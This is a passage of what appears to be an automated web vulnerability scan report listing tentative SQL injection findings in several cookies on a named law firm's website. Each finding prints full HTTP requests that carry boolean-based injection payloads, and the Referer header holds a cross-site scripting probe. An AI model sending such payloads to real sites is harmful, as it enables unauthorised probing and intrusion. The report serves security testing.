<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 11156126'%20or%201%3d1--%20 and 11156126'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Thu, 13-May-2010 00:35:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 19712225'%20or%201%3d1--%20 and 19712225'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Thu, 13-May-2010 00:35:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 69636218%20or%201%3d1--%20 and 69636218%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 17:52:49 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822681;path=/
Set-Cookie: CFTOKEN=69086628;path=/
Date: Thu, 12 May 2011 17:52:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14408940%20or%201%3d1--%20 and 14408940%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 17:52:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822701;path=/
Set-Cookie: CFTOKEN=52571639;path=/
Date: Thu, 12 May 2011 17:52:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 43088770'%20or%201%3d1--%20 and 43088770'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 17:53:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
